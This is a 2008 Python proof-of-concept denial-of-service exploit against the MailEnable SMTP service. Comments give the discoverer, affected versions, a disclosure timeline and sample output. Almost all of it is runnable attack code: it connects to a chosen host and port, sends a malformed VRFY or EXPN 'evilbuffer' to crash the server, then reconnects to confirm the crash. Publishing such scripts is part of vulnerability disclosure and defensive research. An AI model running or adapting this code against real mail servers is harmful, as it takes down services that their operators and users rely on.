mailenable-dos.txt

`#!/usr/bin/python  
##########################################################################  
#  
# MailEnable SMTP Service VRFY/EXPN Command Buffer Overflow ( DoS )   
# Bug discovered by Matteo Memelli aka ryujin   
# http://www.gray-world.net http://www.be4mind.com  
#  
# Affected Versions : Standard Edition all versions  
# Professional Edition all versions  
# Enterprise Edition all versions  
# Tested on OS : Windows 2000 SP4 English  
# Windows 2003 Standard Edition Italian  
# Windows XP SP2 English  
# Discovery Date : 02/24/2008  
# Initial vendor notification : 03/06/2008  
# Coordinated public disclosure: 03/11/2008  
#  
# CONGRATS TO THE MAILENABLE TEAM: VERY FAST IN PATCHING AND ANSWERING!!  
#  
#-------------------------------------------------------------------------  
#  
# THX TO muts at offensive-security.com :   
# I'll promise you: next time i'll find an easier one and get my shell :P  
#  
#-------------------------------------------------------------------------  
##########################################################################  
#  
# matte@badrobot:~$ ./mailenable_smtp.py -H 192.168.1.245 -P 25 -c VRFY  
# [+] Connecting to 192.168.1.245 on port 25  
# 220 test.local ESMTP MailEnable Service, Version: 0-3.13- ready at \  
# 03/06/08 13:20:49  
#  
# [+] Sending evilbuffer...  
# [+] Waiting 10 secs before reconnecting...  
# [+] Reconnecting...  
# [+] SMTP Server died!  
# [+] Connection refused  
#  
##########################################################################  
  
from socket import *  
from optparse import OptionParser  
import sys, time  
  
usage = "%prog -H TARGET_HOST -P TARGET_PORT [-c COMMAND]"  
parser = OptionParser(usage=usage)  
parser.add_option("-H", "--target_host", type="string",  
action="store", dest="HOST",  
help="Target Host")  
parser.add_option("-P", "--target_port", type="int",  
action="store", dest="PORT",  
help="Target Port")  
parser.add_option("-c", "--command", type="string",  
action="store", dest="COMMAND",  
help="Command: VRFY or EXPN ; defualt VRFY")  
(options, args) = parser.parse_args()  
HOST = options.HOST  
PORT = options.PORT  
COMMAND = options.COMMAND  
if not (HOST and PORT):  
parser.print_help()  
sys.exit()  
if not COMMAND:  
COMMAND = 'VRFY'  
print "[+] Using default command VRFY"  
else:  
COMMAND = COMMAND.upper().strip()  
if COMMAND != 'VRFY' and COMMAND != 'EXPN':  
print 'Invalid command "%s" Choose between VRFY or EXPN!' % COMMAND  
sys.exit()  
evilbuf = '%s \nSMTPISGONNADIE\r\n' % COMMAND  
s = socket(AF_INET, SOCK_STREAM)  
s.connect((HOST, PORT))  
print "[+] Connecting to %s on port %d" % (HOST, PORT)  
print s.recv(1024)  
print "[+] Sending evilbuffer..."  
s.send(evilbuf)  
s.close()  
print "[+] Waiting 10 secs before reconnecting..."  
time.sleep(10)  
try:  
s = socket(AF_INET, SOCK_STREAM)  
print "[+] Reconnecting..."  
s.connect((HOST, PORT))  
except error, e:  
print "[+] SMTP Server died!"  
print "[+] %s" % e[1]  
else:  
print "[-] SMTP Server is still up"  
print "[-] This probably means that is not vulnerable"  
s.close()  
`